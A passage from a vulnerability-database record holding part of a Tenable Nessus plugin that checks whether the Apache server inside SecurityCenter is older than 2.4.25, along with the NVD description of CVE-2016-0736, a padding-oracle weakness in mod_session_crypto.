script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/06/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:tenable:securitycenter\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"securitycenter_installed.nbin\", \"securitycenter_detect.nbin\");\n script_require_ports(\"Host/SecurityCenter/Version\", \"installed_sw/SecurityCenter\", \"Host/SecurityCenter/support/httpd/version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp = \"Apache (within SecurityCenter)\";\nfix = \"2.4.25\";\n\nsc_ver = get_kb_item(\"Host/SecurityCenter/Version\");\nport = 0;\nif(empty_or_null(sc_ver))\n{\n port = 443;\n install = get_single_install(app_name:\"SecurityCenter\", combined:TRUE, exit_if_unknown_ver:TRUE);\n sc_ver = install[\"version\"];\n}\nif (empty_or_null(sc_ver)) audit(AUDIT_NOT_INST, \"SecurityCenter\");\n\nversion = get_kb_item(\"Host/SecurityCenter/support/httpd/version\");\nif (empty_or_null(version)) audit(AUDIT_UNKNOWN_APP_VER, app);\n\nif (ver_compare(ver:version, minver:\"2.3\", fix:fix, strict:FALSE) < 0)\n{\n report =\n '\\n SecurityCenter version : ' + sc_ver +\n '\\n SecurityCenter Apache version : ' + version +\n '\\n Fixed Apache version : ' + fix +\n '\\n';\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, app, version);\n", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2019-08-16T11:52:57", "bulletinFamily": "NVD", "description": "In Apache HTTP Server versions 2.4.0 to 2.4.23, mod_session_crypto was encrypting its data/cookie using the configured ciphers with possibly either CBC or ECB modes of operation (AES256-CBC by default), hence no selectable or builtin authenticated encryption. 
This made it vulnerable to padding oracle attacks, particularly with CBC.", "modified": "2018-04-25T01:29:00", "id": "CVE-2016-0736", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0736", "published": "2017-07-27T21:29:00", "title": "CVE-2016-0736", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}